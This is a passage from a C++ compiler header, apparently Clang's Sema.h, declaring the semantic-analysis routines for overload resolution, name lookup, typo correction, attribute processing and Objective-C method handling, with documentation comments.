const Expr *ThisArg,
ArrayRef<const Expr *> Args,
SourceLocation Loc);
/// Emit diagnostics for the diagnose_if attributes on Function, ignoring any
/// ArgDependent DiagnoseIfAttrs.
///
/// Argument-independent diagnose_if attributes should be checked on every use
/// of a function.
///
/// Returns true if any errors were emitted.
bool diagnoseArgIndependentDiagnoseIfAttrs(const NamedDecl *ND,
SourceLocation Loc);
/// Returns whether the given function's address can be taken or not,
/// optionally emitting a diagnostic if the address can't be taken.
///
/// Returns false if taking the address of the function is illegal.
bool checkAddressOfFunctionIsAvailable(const FunctionDecl *Function,
bool Complain = false,
SourceLocation Loc = SourceLocation());
// [PossiblyAFunctionType] --> [Return]
// NonFunctionType --> NonFunctionType
// R (A) --> R(A)
// R (*)(A) --> R (A)
// R (&)(A) --> R (A)
// R (S::*)(A) --> R (A)
QualType ExtractUnqualifiedFunctionType(QualType PossiblyAFunctionType);
FunctionDecl *
ResolveAddressOfOverloadedFunction(Expr *AddressOfExpr,
QualType TargetType,
bool Complain,
DeclAccessPair &Found,
bool *pHadMultipleCandidates = nullptr);
FunctionDecl *
resolveAddressOfSingleOverloadCandidate(Expr *E, DeclAccessPair &FoundResult);
bool resolveAndFixAddressOfSingleOverloadCandidate(
ExprResult &SrcExpr, bool DoFunctionPointerConversion = false);
FunctionDecl *
ResolveSingleFunctionTemplateSpecialization(OverloadExpr *ovl,
bool Complain = false,
DeclAccessPair *Found = nullptr);
bool ResolveAndFixSingleFunctionTemplateSpecialization(
ExprResult &SrcExpr,
bool DoFunctionPointerConversion = false,
bool Complain = false,
SourceRange OpRangeForComplaining = SourceRange(),
QualType DestTypeForComplaining = QualType(),
unsigned DiagIDForComplaining = 0);
Expr *FixOverloadedFunctionReference(Expr *E,
DeclAccessPair FoundDecl,
FunctionDecl *Fn);
ExprResult FixOverloadedFunctionReference(ExprResult,
DeclAccessPair FoundDecl,
FunctionDecl *Fn);
void AddOverloadedCallCandidates(UnresolvedLookupExpr *ULE,
ArrayRef<Expr *> Args,
OverloadCandidateSet &CandidateSet,
bool PartialOverloading = false);
// An enum used to represent the different possible results of building a
// range-based for loop.
enum ForRangeStatus {
FRS_Success,
FRS_NoViableFunction,
FRS_DiagnosticIssued
};
ForRangeStatus BuildForRangeBeginEndCall(SourceLocation Loc,
SourceLocation RangeLoc,
const DeclarationNameInfo &NameInfo,
LookupResult &MemberLookup,
OverloadCandidateSet *CandidateSet,
Expr *Range, ExprResult *CallExpr);
ExprResult BuildOverloadedCallExpr(Scope *S, Expr *Fn,
UnresolvedLookupExpr *ULE,
SourceLocation LParenLoc,
MultiExprArg Args,
SourceLocation RParenLoc,
Expr *ExecConfig,
bool AllowTypoCorrection=true,
bool CalleesAddressIsTaken=false);
bool buildOverloadedCallSet(Scope *S, Expr *Fn, UnresolvedLookupExpr *ULE,
MultiExprArg Args, SourceLocation RParenLoc,
OverloadCandidateSet *CandidateSet,
ExprResult *Result);
ExprResult CreateOverloadedUnaryOp(SourceLocation OpLoc,
UnaryOperatorKind Opc,
const UnresolvedSetImpl &Fns,
Expr *input, bool RequiresADL = true);
void LookupOverloadedBinOp(OverloadCandidateSet &CandidateSet,
OverloadedOperatorKind Op,
const UnresolvedSetImpl &Fns,
ArrayRef<Expr *> Args, bool RequiresADL = true);
ExprResult CreateOverloadedBinOp(SourceLocation OpLoc,
BinaryOperatorKind Opc,
const UnresolvedSetImpl &Fns,
Expr *LHS, Expr *RHS,
bool RequiresADL = true,
bool AllowRewrittenCandidates = true,
FunctionDecl *DefaultedFn = nullptr);
ExprResult BuildSynthesizedThreeWayComparison(SourceLocation OpLoc,
const UnresolvedSetImpl &Fns,
Expr *LHS, Expr *RHS,
FunctionDecl *DefaultedFn);
ExprResult CreateOverloadedArraySubscriptExpr(SourceLocation LLoc,
SourceLocation RLoc,
Expr *Base,Expr *Idx);
ExprResult
BuildCallToMemberFunction(Scope *S, Expr *MemExpr,
SourceLocation LParenLoc,
MultiExprArg Args,
SourceLocation RParenLoc);
ExprResult
BuildCallToObjectOfClassType(Scope *S, Expr *Object, SourceLocation LParenLoc,
MultiExprArg Args,
SourceLocation RParenLoc);
ExprResult BuildOverloadedArrowExpr(Scope *S, Expr *Base,
SourceLocation OpLoc,
bool *NoArrowOperatorFound = nullptr);
/// CheckCallReturnType - Checks that a call expression's return type is
/// complete. Returns true on failure. The location passed in is the location
/// that best represents the call.
bool CheckCallReturnType(QualType ReturnType, SourceLocation Loc,
CallExpr *CE, FunctionDecl *FD);
/// Helpers for dealing with blocks and functions.
bool CheckParmsForFunctionDef(ArrayRef<ParmVarDecl *> Parameters,
bool CheckParameterNames);
void CheckCXXDefaultArguments(FunctionDecl *FD);
void CheckExtraCXXDefaultArguments(Declarator &D);
Scope *getNonFieldDeclScope(Scope *S);
/// \name Name lookup
///
/// These routines provide name lookup that is used during semantic
/// analysis to resolve the various kinds of names (identifiers,
/// overloaded operator names, constructor names, etc.) into zero or
/// more declarations within a particular scope. The major entry
/// points are LookupName, which performs unqualified name lookup,
/// and LookupQualifiedName, which performs qualified name lookup.
///
/// All name lookup is performed based on some specific criteria,
/// which specify what names will be visible to name lookup and how
/// far name lookup should work. These criteria are important both
/// for capturing language semantics (certain lookups will ignore
/// certain names, for example) and for performance, since name
/// lookup is often a bottleneck in the compilation of C++. Name
/// lookup criteria is specified via the LookupCriteria enumeration.
///
/// The results of name lookup can vary based on the kind of name
/// lookup performed, the current language, and the translation
/// unit. In C, for example, name lookup will either return nothing
/// (no entity found) or a single declaration. In C++, name lookup
/// can additionally refer to a set of overloaded functions or
/// result in an ambiguity. All of the possible results of name
/// lookup are captured by the LookupResult class, which provides
/// the ability to distinguish among them.
//@{
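// A minimal usage sketch for this group (assumed client code; a hedged
// illustration, not a canonical recipe):
//
//   LookupResult R(SemaRef, Name, Loc, Sema::LookupOrdinaryName);
//   if (SemaRef.LookupName(R, S) && R.isSingleResult())
//     NamedDecl *D = R.getFoundDecl();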
/// Describes the kind of name lookup to perform.
enum LookupNameKind {
/// Ordinary name lookup, which finds ordinary names (functions,
/// variables, typedefs, etc.) in C and most kinds of names
/// (functions, variables, members, types, etc.) in C++.
LookupOrdinaryName = 0,
/// Tag name lookup, which finds the names of enums, classes,
/// structs, and unions.
LookupTagName,
/// Label name lookup.
LookupLabel,
/// Member name lookup, which finds the names of
/// class/struct/union members.
LookupMemberName,
/// Look up of an operator name (e.g., operator+) for use with
/// operator overloading. This lookup is similar to ordinary name
/// lookup, but will ignore any declarations that are class members.
LookupOperatorName,
/// Look up a name following ~ in a destructor name. This is an ordinary
/// lookup, but prefers tags to typedefs.
LookupDestructorName,
/// Look up of a name that precedes the '::' scope resolution
/// operator in C++. This lookup completely ignores operator, object,
/// function, and enumerator names (C++ [basic.lookup.qual]p1).
LookupNestedNameSpecifierName,
/// Look up a namespace name within a C++ using directive or
/// namespace alias definition, ignoring non-namespace names (C++
/// [basic.lookup.udir]p1).
LookupNamespaceName,
/// Look up all declarations in a scope with the given name,
/// including resolved using declarations. This is appropriate
/// for checking redeclarations for a using declaration.
LookupUsingDeclName,
/// Look up an ordinary name that is going to be redeclared as a
/// name with linkage. This lookup ignores any declarations that
/// are outside of the current scope unless they have linkage. See
/// C99 6.2.2p4-5 and C++ [basic.link]p6.
LookupRedeclarationWithLinkage,
/// Look up a friend of a local class. This lookup does not look
/// outside the innermost non-class scope. See C++11 [class.friend]p11.
LookupLocalFriendName,
/// Look up the name of an Objective-C protocol.
LookupObjCProtocolName,
/// Look up the implicit 'self' parameter of an Objective-C method.
LookupObjCImplicitSelfParam,
/// Look up the name of an OpenMP user-defined reduction operation.
LookupOMPReductionName,
/// Look up the name of an OpenMP user-defined mapper.
LookupOMPMapperName,
/// Look up any declaration with any name.
LookupAnyName
};
/// Specifies whether (or how) name lookup is being performed for a
/// redeclaration (vs. a reference).
enum RedeclarationKind {
/// The lookup is a reference to this name that is not for the
/// purpose of redeclaring the name.
NotForRedeclaration = 0,
/// The lookup results will be used for redeclaration of a name,
/// if an entity by that name already exists and is visible.
ForVisibleRedeclaration,
/// The lookup results will be used for redeclaration of a name
/// with external linkage; non-visible lookup results with external linkage
/// may also be found.
ForExternalRedeclaration
};
RedeclarationKind forRedeclarationInCurContext() {
// A declaration with an owning module for linkage can never link against
// anything that is not visible. We don't need to check linkage here; if
// the context has internal linkage, redeclaration lookup won't find things
// from other TUs, and we can't safely compute linkage yet in general.
if (cast<Decl>(CurContext)
->getOwningModuleForLinkage(/*IgnoreLinkage*/true))
return ForVisibleRedeclaration;
return ForExternalRedeclaration;
}
/// The possible outcomes of name lookup for a literal operator.
enum LiteralOperatorLookupResult {
/// The lookup resulted in an error.
LOLR_Error,
/// The lookup found no match but no diagnostic was issued.
LOLR_ErrorNoDiagnostic,
/// The lookup found a single 'cooked' literal operator, which
/// expects a normal literal to be built and passed to it.
LOLR_Cooked,
/// The lookup found a single 'raw' literal operator, which expects
/// a string literal containing the spelling of the literal token.
LOLR_Raw,
/// The lookup found an overload set of literal operator templates,
/// which expect the characters of the spelling of the literal token to be
/// passed as a non-type template argument pack.
LOLR_Template,
/// The lookup found an overload set of literal operator templates,
/// which expect the character type and characters of the spelling of the
/// string literal token to be passed as template arguments.
LOLR_StringTemplate
};
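// For reference, the operator forms these results correspond to (standard
// C++ example declarations, not taken from this header):
//
//   long double operator""_deg(long double);   // LOLR_Cooked
//   int operator""_raw(const char *);          // LOLR_Raw
//   template <char...> int operator""_seq();   // LOLR_Template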
SpecialMemberOverloadResult LookupSpecialMember(CXXRecordDecl *D,
CXXSpecialMember SM,
bool ConstArg,
bool VolatileArg,
bool RValueThis,
bool ConstThis,
bool VolatileThis);
typedef std::function<void(const TypoCorrection &)> TypoDiagnosticGenerator;
typedef std::function<ExprResult(Sema &, TypoExpr *, TypoCorrection)>
TypoRecoveryCallback;
private:
bool CppLookupName(LookupResult &R, Scope *S);
struct TypoExprState {
std::unique_ptr<TypoCorrectionConsumer> Consumer;
TypoDiagnosticGenerator DiagHandler;
TypoRecoveryCallback RecoveryHandler;
TypoExprState();
TypoExprState(TypoExprState &&other) noexcept;
TypoExprState &operator=(TypoExprState &&other) noexcept;
};
/// The set of unhandled TypoExprs and their associated state.
llvm::MapVector<TypoExpr *, TypoExprState> DelayedTypos;
/// Creates a new TypoExpr AST node.
TypoExpr *createDelayedTypo(std::unique_ptr<TypoCorrectionConsumer> TCC,
TypoDiagnosticGenerator TDG,
TypoRecoveryCallback TRC);
// The set of known/encountered (unique, canonicalized) NamespaceDecls.
//
// The boolean value will be true to indicate that the namespace was loaded
// from an AST/PCH file, or false otherwise.
llvm::MapVector<NamespaceDecl*, bool> KnownNamespaces;
/// Whether we have already loaded known namespaces from an external
/// source.
bool LoadedExternalKnownNamespaces;
/// Helper for CorrectTypo and CorrectTypoDelayed used to create and
/// populate a new TypoCorrectionConsumer. Returns nullptr if typo correction
/// should be skipped entirely.
std::unique_ptr<TypoCorrectionConsumer>
makeTypoCorrectionConsumer(const DeclarationNameInfo &Typo,
Sema::LookupNameKind LookupKind, Scope *S,
CXXScopeSpec *SS,
CorrectionCandidateCallback &CCC,
DeclContext *MemberContext, bool EnteringContext,
const ObjCObjectPointerType *OPT,
bool ErrorRecovery);
public:
const TypoExprState &getTypoExprState(TypoExpr *TE) const;
/// Clears the state of the given TypoExpr.
void clearDelayedTypo(TypoExpr *TE);
/// Look up a name, looking for a single declaration. Return
/// null if the results were absent, ambiguous, or overloaded.
///
/// It is preferable to use the elaborated form and explicitly handle
/// ambiguity and overloading.
NamedDecl *LookupSingleName(Scope *S, DeclarationName Name,
SourceLocation Loc,
LookupNameKind NameKind,
RedeclarationKind Redecl
= NotForRedeclaration);
bool LookupBuiltin(LookupResult &R);
bool LookupName(LookupResult &R, Scope *S,
bool AllowBuiltinCreation = false);
bool LookupQualifiedName(LookupResult &R, DeclContext *LookupCtx,
bool InUnqualifiedLookup = false);
bool LookupQualifiedName(LookupResult &R, DeclContext *LookupCtx,
CXXScopeSpec &SS);
bool LookupParsedName(LookupResult &R, Scope *S, CXXScopeSpec *SS,
bool AllowBuiltinCreation = false,
bool EnteringContext = false);
ObjCProtocolDecl *LookupProtocol(IdentifierInfo *II, SourceLocation IdLoc,
RedeclarationKind Redecl
= NotForRedeclaration);
bool LookupInSuper(LookupResult &R, CXXRecordDecl *Class);
void LookupOverloadedOperatorName(OverloadedOperatorKind Op, Scope *S,
QualType T1, QualType T2,
UnresolvedSetImpl &Functions);
LabelDecl *LookupOrCreateLabel(IdentifierInfo *II, SourceLocation IdentLoc,
SourceLocation GnuLabelLoc = SourceLocation());
DeclContextLookupResult LookupConstructors(CXXRecordDecl *Class);
CXXConstructorDecl *LookupDefaultConstructor(CXXRecordDecl *Class);
CXXConstructorDecl *LookupCopyingConstructor(CXXRecordDecl *Class,
unsigned Quals);
CXXMethodDecl *LookupCopyingAssignment(CXXRecordDecl *Class, unsigned Quals,
bool RValueThis, unsigned ThisQuals);
CXXConstructorDecl *LookupMovingConstructor(CXXRecordDecl *Class,
unsigned Quals);
CXXMethodDecl *LookupMovingAssignment(CXXRecordDecl *Class, unsigned Quals,
bool RValueThis, unsigned ThisQuals);
CXXDestructorDecl *LookupDestructor(CXXRecordDecl *Class);
bool checkLiteralOperatorId(const CXXScopeSpec &SS, const UnqualifiedId &Id);
LiteralOperatorLookupResult LookupLiteralOperator(Scope *S, LookupResult &R,
ArrayRef<QualType> ArgTys,
bool AllowRaw,
bool AllowTemplate,
bool AllowStringTemplate,
bool DiagnoseMissing);
bool isKnownName(StringRef name);
/// Emission status of a function, based on its CUDA/HIP/OpenMP host/device
/// attributes.
enum class FunctionEmissionStatus {
Emitted,
CUDADiscarded, // Discarded due to CUDA/HIP hostness
OMPDiscarded, // Discarded due to OpenMP hostness
TemplateDiscarded, // Discarded due to uninstantiated templates
Unknown,
};
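// A hedged illustration of how these states can arise (assumed scenario):
//
//   __device__ void d() {}          // CUDADiscarded when compiling for host
//   template <class T> void t() {}  // TemplateDiscarded until instantiated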
FunctionEmissionStatus getEmissionStatus(FunctionDecl *Decl,
bool Final = false);
// Whether the callee should be ignored in the CUDA/HIP/OpenMP host/device
// check.
bool shouldIgnoreInHostDeviceCheck(FunctionDecl *Callee);
void ArgumentDependentLookup(DeclarationName Name, SourceLocation Loc,
ArrayRef<Expr *> Args, ADLResult &Functions);
void LookupVisibleDecls(Scope *S, LookupNameKind Kind,
VisibleDeclConsumer &Consumer,
bool IncludeGlobalScope = true,
bool LoadExternal = true);
void LookupVisibleDecls(DeclContext *Ctx, LookupNameKind Kind,
VisibleDeclConsumer &Consumer,
bool IncludeGlobalScope = true,
bool IncludeDependentBases = false,
bool LoadExternal = true);
enum CorrectTypoKind {
CTK_NonError, // CorrectTypo used in a non-error-recovery situation.
CTK_ErrorRecovery // CorrectTypo used in normal error recovery.
};
TypoCorrection CorrectTypo(const DeclarationNameInfo &Typo,
Sema::LookupNameKind LookupKind,
Scope *S, CXXScopeSpec *SS,
CorrectionCandidateCallback &CCC,
CorrectTypoKind Mode,
DeclContext *MemberContext = nullptr,
bool EnteringContext = false,
const ObjCObjectPointerType *OPT = nullptr,
bool RecordFailure = true);
TypoExpr *CorrectTypoDelayed(const DeclarationNameInfo &Typo,
Sema::LookupNameKind LookupKind, Scope *S,
CXXScopeSpec *SS,
CorrectionCandidateCallback &CCC,
TypoDiagnosticGenerator TDG,
TypoRecoveryCallback TRC, CorrectTypoKind Mode,
DeclContext *MemberContext = nullptr,
bool EnteringContext = false,
const ObjCObjectPointerType *OPT = nullptr);
/// Process any TypoExprs in the given Expr and its children,
/// generating diagnostics as appropriate. Returns a new Expr if all typos
/// were successfully corrected, or ExprError if one or more typos could not
/// be corrected.
///
/// \param E The Expr to check for TypoExprs.
///
/// \param InitDecl A VarDecl to avoid because the Expr being corrected is its
/// initializer.
///
/// \param Filter A function applied to a newly rebuilt Expr to determine if
/// it is an acceptable/usable result from a single combination of typo
/// corrections. As long as the filter returns ExprError, different
/// combinations of corrections will be tried until all are exhausted.
ExprResult
CorrectDelayedTyposInExpr(Expr *E, VarDecl *InitDecl = nullptr,
llvm::function_ref<ExprResult(Expr *)> Filter =
[](Expr *E) -> ExprResult { return E; });
ExprResult
CorrectDelayedTyposInExpr(Expr *E,
llvm::function_ref<ExprResult(Expr *)> Filter) {
return CorrectDelayedTyposInExpr(E, nullptr, Filter);
}
ExprResult
CorrectDelayedTyposInExpr(ExprResult ER, VarDecl *InitDecl = nullptr,
llvm::function_ref<ExprResult(Expr *)> Filter =
[](Expr *E) -> ExprResult { return E; }) {
return ER.isInvalid() ? ER : CorrectDelayedTyposInExpr(ER.get(), Filter);
}
ExprResult
CorrectDelayedTyposInExpr(ExprResult ER,
llvm::function_ref<ExprResult(Expr *)> Filter) {
return CorrectDelayedTyposInExpr(ER, nullptr, Filter);
}
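// A usage sketch for the Filter parameter; isAcceptable is a hypothetical
// predicate standing in for caller-specific validation:
//
//   ExprResult Fixed = S.CorrectDelayedTyposInExpr(
//       E, /*InitDecl=*/nullptr, [](Expr *Candidate) -> ExprResult {
//         return isAcceptable(Candidate) ? Candidate : ExprError();
//       });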
void diagnoseTypo(const TypoCorrection &Correction,
const PartialDiagnostic &TypoDiag,
bool ErrorRecovery = true);
void diagnoseTypo(const TypoCorrection &Correction,
const PartialDiagnostic &TypoDiag,
const PartialDiagnostic &PrevNote,
bool ErrorRecovery = true);
void MarkTypoCorrectedFunctionDefinition(const NamedDecl *F);
void FindAssociatedClassesAndNamespaces(SourceLocation InstantiationLoc,
ArrayRef<Expr *> Args,
AssociatedNamespaceSet &AssociatedNamespaces,
AssociatedClassSet &AssociatedClasses);
void FilterLookupForScope(LookupResult &R, DeclContext *Ctx, Scope *S,
bool ConsiderLinkage, bool AllowInlineNamespace);
bool CheckRedeclarationModuleOwnership(NamedDecl *New, NamedDecl *Old);
void DiagnoseAmbiguousLookup(LookupResult &Result);
//@}
/// Attempts to produce a RecoveryExpr after some AST node cannot be created.
ExprResult CreateRecoveryExpr(SourceLocation Begin, SourceLocation End,
ArrayRef<Expr *> SubExprs);
ObjCInterfaceDecl *getObjCInterfaceDecl(IdentifierInfo *&Id,
SourceLocation IdLoc,
bool TypoCorrection = false);
NamedDecl *LazilyCreateBuiltin(IdentifierInfo *II, unsigned ID,
Scope *S, bool ForRedeclaration,
SourceLocation Loc);
NamedDecl *ImplicitlyDefineFunction(SourceLocation Loc, IdentifierInfo &II,
Scope *S);
void AddKnownFunctionAttributesForReplaceableGlobalAllocationFunction(
FunctionDecl *FD);
void AddKnownFunctionAttributes(FunctionDecl *FD);
// More parsing and symbol table subroutines.
void ProcessPragmaWeak(Scope *S, Decl *D);
// Decl attributes - this routine is the top level dispatcher.
void ProcessDeclAttributes(Scope *S, Decl *D, const Declarator &PD);
// Helper for delayed processing of attributes.
void ProcessDeclAttributeDelayed(Decl *D,
const ParsedAttributesView &AttrList);
void ProcessDeclAttributeList(Scope *S, Decl *D, const ParsedAttributesView &AL,
bool IncludeCXX11Attributes = true);
bool ProcessAccessDeclAttributeList(AccessSpecDecl *ASDecl,
const ParsedAttributesView &AttrList);
void checkUnusedDeclAttributes(Declarator &D);
/// Map any API notes provided for this declaration to attributes on the
/// declaration.
///
/// Triggered by declaration-attribute processing.
void ProcessAPINotes(Decl *D);
/// Determine if type T is a valid subject for a nonnull and similar
/// attributes. By default, we look through references (the behavior used by
/// nonnull), but if the second parameter is true, then we treat a reference
/// type as valid.
bool isValidPointerAttrType(QualType T, bool RefOkay = false);
bool CheckRegparmAttr(const ParsedAttr &attr, unsigned &value);
bool CheckCallingConvAttr(const ParsedAttr &attr, CallingConv &CC,
const FunctionDecl *FD = nullptr);
bool CheckAttrTarget(const ParsedAttr &CurrAttr);
bool CheckAttrNoArgs(const ParsedAttr &CurrAttr);
bool checkStringLiteralArgumentAttr(const ParsedAttr &Attr, unsigned ArgNum,
StringRef &Str,
SourceLocation *ArgLocation = nullptr);
bool checkSectionName(SourceLocation LiteralLoc, StringRef Str);
bool checkTargetAttr(SourceLocation LiteralLoc, StringRef Str);
bool checkMSInheritanceAttrOnDefinition(
CXXRecordDecl *RD, SourceRange Range, bool BestCase,
MSInheritanceModel SemanticSpelling);
void CheckAlignasUnderalignment(Decl *D);
/// Adjust the calling convention of a method to be the ABI default if it
/// wasn't specified explicitly. This handles method types formed from
/// function type typedefs and typename template arguments.
void adjustMemberFunctionCC(QualType &T, bool IsStatic, bool IsCtorOrDtor,
SourceLocation Loc);
// Check if there is an explicit attribute, but only look through parens.
// The intent is to look for an attribute on the current declarator, but not
// one that came from a typedef.
bool hasExplicitCallingConv(QualType T);
/// Get the outermost AttributedType node that sets a calling convention.
/// Valid types should not have multiple attributes with different CCs.
const AttributedType *getCallingConvAttributedType(QualType T) const;
/// Check whether a nullability type specifier can be added to the given
/// type through some means not written in source (e.g. API notes).
///
/// \param type The type to which the nullability specifier will be
/// added. On success, this type will be updated appropriately.
///
/// \param nullability The nullability specifier to add.
///
/// \param diagLoc The location to use for diagnostics.
///
/// \param allowArrayTypes Whether to accept nullability specifiers on an
/// array type (e.g., because it will decay to a pointer).
///
/// \param overrideExisting Whether to override an existing, locally-specified
/// nullability specifier rather than complaining about the conflict.
///
/// \returns true if nullability cannot be applied, false otherwise.
bool checkImplicitNullabilityTypeSpecifier(QualType &type,
NullabilityKind nullability,
SourceLocation diagLoc,
bool allowArrayTypes,
bool overrideExisting);
/// Stmt attributes - this routine is the top level dispatcher.
StmtResult ProcessStmtAttributes(Stmt *Stmt,
const ParsedAttributesView &Attrs,
SourceRange Range);
void WarnConflictingTypedMethods(ObjCMethodDecl *Method,
ObjCMethodDecl *MethodDecl,
bool IsProtocolMethodDecl);
void CheckConflictingOverridingMethod(ObjCMethodDecl *Method,
ObjCMethodDecl *Overridden,
bool IsProtocolMethodDecl);
/// WarnExactTypedMethods - This routine issues a warning if a method
/// implementation declaration matches exactly that of its declaration.
void WarnExactTypedMethods(ObjCMethodDecl *Method,
ObjCMethodDecl *MethodDecl,
bool IsProtocolMethodDecl);
typedef llvm::SmallPtrSet<Selector, 8> SelectorSet;
/// CheckImplementationIvars - This routine checks if the instance variables
/// listed in the implementation match those listed in the interface.
void CheckImplementationIvars(ObjCImplementationDecl *ImpDecl,
ObjCIvarDecl **Fields, unsigned nIvars,
SourceLocation Loc);
/// ImplMethodsVsClassMethods - This is the main routine to warn if any method
/// remains unimplemented in the class or category \@implementation.
void ImplMethodsVsClassMethods(Scope *S, ObjCImplDecl* IMPDecl,
ObjCContainerDecl* IDecl,
bool IncompleteImpl = false);
/// DiagnoseUnimplementedProperties - This routine warns on those properties
/// which must be implemented by this implementation.
void DiagnoseUnimplementedProperties(Scope *S, ObjCImplDecl* IMPDecl,
ObjCContainerDecl *CDecl,
bool SynthesizeProperties);
/// Diagnose any null-resettable synthesized setters.
void diagnoseNullResettableSynthesizedSetters(const ObjCImplDecl *impDecl);
/// DefaultSynthesizeProperties - This routine default synthesizes all
/// properties which must be synthesized in the class's \@implementation.
void DefaultSynthesizeProperties(Scope *S, ObjCImplDecl *IMPDecl,
ObjCInterfaceDecl *IDecl,
SourceLocation AtEnd);
void DefaultSynthesizeProperties(Scope *S, Decl *D, SourceLocation AtEnd);
/// IvarBacksCurrentMethodAccessor - This routine returns 'true' if 'IV' is
/// an ivar synthesized for 'Method' and 'Method' is a property accessor
/// declared in class 'IFace'.
bool IvarBacksCurrentMethodAccessor(ObjCInterfaceDecl *IFace,
ObjCMethodDecl *Method, ObjCIvarDecl *IV);
/// DiagnoseUnusedBackingIvarInAccessor - Issue an 'unused' warning if the
/// ivar which backs the property is not used in the property's accessor.
void DiagnoseUnusedBackingIvarInAccessor(Scope *S,
const ObjCImplementationDecl *ImplD);
/// GetIvarBackingPropertyAccessor - If the method is a property setter/getter
/// and its property has a backing ivar, returns this ivar; otherwise, returns
/// NULL. It also returns the ivar's property on success.
ObjCIvarDecl *GetIvarBackingPropertyAccessor(const ObjCMethodDecl *Method,
const ObjCPropertyDecl *&PDecl) const;
/// Called by ActOnProperty to handle \@property declarations in
/// class extensions.
ObjCPropertyDecl *HandlePropertyInClassExtension(Scope *S,
SourceLocation AtLoc,
SourceLocation LParenLoc,
FieldDeclarator &FD,
Selector GetterSel,
SourceLocation GetterNameLoc,
Selector SetterSel,
SourceLocation SetterNameLoc,
const bool isReadWrite,
unsigned &Attributes,
const unsigned AttributesAsWritten,
QualType T,
TypeSourceInfo *TSI,
tok::ObjCKeywordKind MethodImplKind);
/// Called by ActOnProperty and HandlePropertyInClassExtension to
/// handle creating the ObjcPropertyDecl for a category or \@interface.
ObjCPropertyDecl *CreatePropertyDecl(Scope *S,
ObjCContainerDecl *CDecl,
SourceLocation AtLoc,
SourceLocation LParenLoc,
FieldDeclarator &FD,
Selector GetterSel,
SourceLocation GetterNameLoc,
Selector SetterSel,
SourceLocation SetterNameLoc,
const bool isReadWrite,
const unsigned Attributes,
const unsigned AttributesAsWritten,
QualType T,
TypeSourceInfo *TSI,
tok::ObjCKeywordKind MethodImplKind,
DeclContext *lexicalDC = nullptr);
/// AtomicPropertySetterGetterRules - This routine enforces the rule (via
/// warning) when an atomic property has one, but not the other, of its
/// user-declared setter and getter.
void AtomicPropertySetterGetterRules(ObjCImplDecl* IMPDecl,
ObjCInterfaceDecl* IDecl);
void DiagnoseOwningPropertyGetterSynthesis(const ObjCImplementationDecl *D);
void DiagnoseMissingDesignatedInitOverrides(
const ObjCImplementationDecl *ImplD,
const ObjCInterfaceDecl *IFD);
void DiagnoseDuplicateIvars(ObjCInterfaceDecl *ID, ObjCInterfaceDecl *SID);
enum MethodMatchStrategy {
MMS_loose,
MMS_strict
};
/// MatchTwoMethodDeclarations - Checks whether two methods' types match,
/// returning true if they do and false otherwise.
bool MatchTwoMethodDeclarations(const ObjCMethodDecl *Method,
const ObjCMethodDecl *PrevMethod,
MethodMatchStrategy strategy = MMS_strict);
/// MatchAllMethodDeclarations - Check methods declared in an interface or
/// protocol against those declared in their implementations.
void MatchAllMethodDeclarations(const SelectorSet &InsMap,
const SelectorSet &ClsMap,
SelectorSet &InsMapSeen,
SelectorSet &ClsMapSeen,
ObjCImplDecl* IMPDecl,
ObjCContainerDecl* IDecl,
bool &IncompleteImpl,
bool ImmediateClass,
bool WarnCategoryMethodImpl=false);
/// CheckCategoryVsClassMethodMatches - Checks methods implemented in a
/// category against those implemented in its primary class, and warns each
/// time an exact match is found.
void CheckCategoryVsClassMethodMatches(ObjCCategoryImplDecl *CatIMP);
/// Add the given method to the list of globally-known methods.
void addMethodToGlobalList(ObjCMethodList *List, ObjCMethodDecl *Method);
/// Returns the default address space for method qualifiers.
LangAS getDefaultCXXMethodAddrSpace() const;
private:
/// AddMethodToGlobalPool - Add an instance or factory method to the global
/// pool. See description of AddInstanceMethodToGlobalPool.
void AddMethodToGlobalPool(ObjCMethodDecl *Method, bool impl, bool instance);
/// LookupMethodInGlobalPool - Returns the instance or factory method and
/// optionally warns if there are multiple signatures.
ObjCMethodDecl *LookupMethodInGlobalPool(Selector Sel, SourceRange R,
bool receiverIdOrClass,
bool instance);
public:
/// - Returns instance or factory methods in the global method pool for the
/// given selector. It checks the desired kind first; if none is found and the
/// CheckTheOther parameter is set, it then checks the other kind. If no such
/// method, or only one method, is found, the function returns false;
/// otherwise, it returns true.
bool
CollectMultipleMethodsInGlobalPool(Selector Sel,
SmallVectorImpl<ObjCMethodDecl*>& Methods,
bool InstanceFirst, bool CheckTheOther,
const ObjCObjectType *TypeBound = nullptr);
bool
AreMultipleMethodsInGlobalPool(Selector Sel, ObjCMethodDecl *BestMethod,
SourceRange R, bool receiverIdOrClass,
SmallVectorImpl<ObjCMethodDecl*>& Methods);
void
DiagnoseMultipleMethodInGlobalPool(SmallVectorImpl<ObjCMethodDecl*> &Methods,
Selector Sel, SourceRange R,
bool receiverIdOrClass);
private:
/// - Returns the method which best matches the given argument list, or
/// nullptr if none could be found.
ObjCMethodDecl *SelectBestMethod(Selector Sel, MultiExprArg Args,
bool IsInstance,
SmallVectorImpl<ObjCMethodDecl*>& Methods);
/// Record the typo correction failure and return an empty correction.
TypoCorrection FailedCorrection(IdentifierInfo *Typo, SourceLocation TypoLoc,
bool RecordFailure = true) {
if (RecordFailure)
TypoCorrectionFailures[Typo].insert(TypoLoc);
return TypoCorrection();
}
public:
/// AddInstanceMethodToGlobalPool - All instance methods in a translation
/// unit are added to a global pool. This allows us to efficiently associate
/// a selector with a method declaration for purposes of typechecking
/// messages sent to "id" (where the class of the object is unknown).
void AddInstanceMethodToGlobalPool(ObjCMethodDecl *Method, bool impl=false) {
AddMethodToGlobalPool(Method, impl, /*instance*/true);
}
/// AddFactoryMethodToGlobalPool - Same as above, but for factory methods.
void AddFactoryMethodToGlobalPool(ObjCMethodDecl *Method, bool impl=false) {
AddMethodToGlobalPool(Method, impl, /*instance*/false);
}
/// AddAnyMethodToGlobalPool - Add any method, instance or factory to global
/// pool.
void AddAnyMethodToGlobalPool(Decl *D);
/// LookupInstanceMethodInGlobalPool - Returns the method and warns if
/// there are multiple signatures.
ObjCMethodDecl *LookupInstanceMethodInGlobalPool(Selector Sel, SourceRange R,
bool receiverIdOrClass=false) {
return LookupMethodInGlobalPool(Sel, R, receiverIdOrClass,
/*instance*/true);
}
/// LookupFactoryMethodInGlobalPool - Returns the method and warns if
/// there are multiple signatures.
ObjCMethodDecl *LookupFactoryMethodInGlobalPool(Selector Sel, SourceRange R,
bool receiverIdOrClass=false) {
return LookupMethodInGlobalPool(Sel, R, receiverIdOrClass,
/*instance*/false);
}
const ObjCMethodDecl *SelectorsForTypoCorrection(Selector Sel,
QualType ObjectType=QualType());
/// LookupImplementedMethodInGlobalPool - Returns the method which has an
/// implementation.
